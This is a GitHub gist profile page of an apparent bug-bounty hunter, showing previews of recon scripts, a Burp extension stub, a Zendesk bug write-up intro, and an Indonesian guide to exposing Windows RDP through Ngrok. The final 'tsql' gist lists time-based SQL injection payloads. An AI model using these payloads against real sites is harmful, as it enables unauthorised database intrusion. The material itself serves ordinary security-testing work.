Skip to content

Instantly share code, notes, and snippets.

View marz-hunter's full-sized avatar
🕷️
bug

Marzuki marz-hunter

🕷️
bug
19 followers · 32 following
View GitHub Profile
@marz-hunter
marz-hunter / zendesk.md
Created October 20, 2024 05:36 — forked from hackermondev/zendesk.md
1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies

hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:

say hello to zendesk

If you've spent some time online, you’ve probably come across Zendesk.

Zendesk is a customer service tool used by some of the world’s top companies. It’s easy to set up: you link it to your company’s support email (like [email protected]), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.

Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.

your weakest link

@marz-hunter
marz-hunter / rdp.md
Created August 20, 2024 14:45

Berikut adalah langkah-langkah untuk mengaktifkan Remote Desktop Protocol (RDP) di Windows 10 dan mengaksesnya melalui Ngrok:

1. Aktifkan RDP di Windows 10

  1. Buka Settings dengan menekan tombol Windows + I.

  2. Pilih System > Remote Desktop.

  3. Aktifkan Enable Remote Desktop.

@marz-hunter
marz-hunter / immunefi.py
Created August 2, 2024 12:02
import requests
# Step 1: Get the initial buildId from the first request
response1 = requests.get('https://immunefi.com/bug-bounty/')
response1.raise_for_status() # Ensure we got a successful response
# Find the buildId in the response body
start_index = response1.text.find('"buildId":"') + len('"buildId":"')
end_index = response1.text.find('"', start_index)
build_id = response1.text[start_index:end_index]
@marz-hunter
marz-hunter / root domain.py
Last active July 19, 2024 00:53
#!/usr/bin/python
import io
import tldextract
def extract(infile):
with io.open(infile, encoding='utf-8') as f:
for line in f:
domain = line.strip('\n')
extracted = tldextract.extract(domain)
@marz-hunter
marz-hunter / xss.sh
Last active November 29, 2023 22:46
uro -i waymore.txt -o uro
sleep 1
/root/urldedupe/urldedupe -u uro -s -qs | tee dup
sleep 1
httpx -l dup -nc -sc -ct -o duph
sleep 5
@marz-hunter
marz-hunter / xss.py
Created October 14, 2023 01:05
from burp import IBurpExtender
from burp import IHttpListener
from burp import IProxyListener
from burp import IExtensionHelpers
from burp import IScannerListener
from burp import IExtensionStateListener
from burp import IParameter
from java.io import PrintWriter
from java.net import URLEncoder
from burp import ITab
@marz-hunter
marz-hunter / download site
Created June 1, 2023 23:11
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent
@marz-hunter
marz-hunter / ocr
Created May 21, 2023 21:56
https://www.editpad.org/tool/extract-text-from-image
@marz-hunter
marz-hunter / JSON to urlencoded.py
Created January 2, 2023 02:32
#!/usr/bin/env python3
import json
from urllib.parse import quote, quote_plus
import sys
import os
import argparse
parser = argparse.ArgumentParser(
@marz-hunter
marz-hunter / tsql
Created December 10, 2022 00:04
AND sleep(20)#
'%2b(select*from(select(sleep(20)))a)%2b'
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z